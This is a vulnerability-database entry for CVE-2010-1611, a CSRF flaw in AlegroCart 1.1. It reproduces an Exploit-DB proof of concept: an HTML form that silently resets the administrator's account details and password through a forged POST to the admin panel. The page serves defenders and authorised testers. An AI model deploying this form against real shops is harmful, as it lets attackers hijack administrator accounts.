CVE-2010-1611
Description
Cross-site request forgery (CSRF) vulnerability in AlegroCart 1.1 allows remote attackers to hijack the authentication of the administrator for requests that reset the administrator password via a POST to admin/ with an update action.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or β if you've already worked around this in production β publish your fix to the community-verified tier.
β Propose a mitigation on Community β Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Home Of AlegroCart 1.1 - Cross-Site Request Forgery (Change Administrator Password)
[#]----------------------------------------------------------------[#]
#
# [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password
#
# // Author Info
# [x] Author: The.Morpheus
# [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com>
# [x] Thanks: TΓΌrksec.İnfo ~ Nd And Tg Tayfa :P
# [x] Date : 01.02.2010
#
[#]-------------------------------------------------------------------------------------------[#]
# Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4
# [x] Exploit :
#
# [ XSRF ]
#
# [ Login ]
# http://[server]/[path]/admin/
#
# // Start XSRF
|-------------------------------------------------------------------------------|
<form action="http://server/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form">
width="185"><span class="required">*</span> Username:</td>
<input type="text" name="username" value="admin">
<span class="required">*</span> First Name:</td>
<input type="text" name="firstname" value="admin">
<span class="required">*</span> Last Name:</td>
<input type="text" name="lastname" value="admin">
<td>E-Mail:</td>
<input type="text" name="email" value="admin"></td>
<td>User Group:</td>
<td><select name="user_group_id">
<option value="1" selected>Top Administrator</option>
</select></td>
<td>Password:</td>
<input type="password" name="password" value="" >
<td>Confirm:</td>
<input type="password" name="confirm" value="">
</form>
|-------------------------------------------------------------------------------|
# // End of attack ~
#
[#]------------------------------------------------------------------------------------------[#]Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| alegrocart | alegrocart | 1.1 | |
References
- http://forum.alegrocart.com/viewtopic.php?f=8&t=54
- http://osvdb.org/62073
- http://packetstormsecurity.org/1002-exploits/alegrocart-xsrf.txt
- http://secunia.com/advisories/38386
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56037
- http://forum.alegrocart.com/viewtopic.php?f=8&t=54
- http://osvdb.org/62073
- http://packetstormsecurity.org/1002-exploits/alegrocart-xsrf.txt
- http://secunia.com/advisories/38386
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56037
CWEs
CWE-352
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.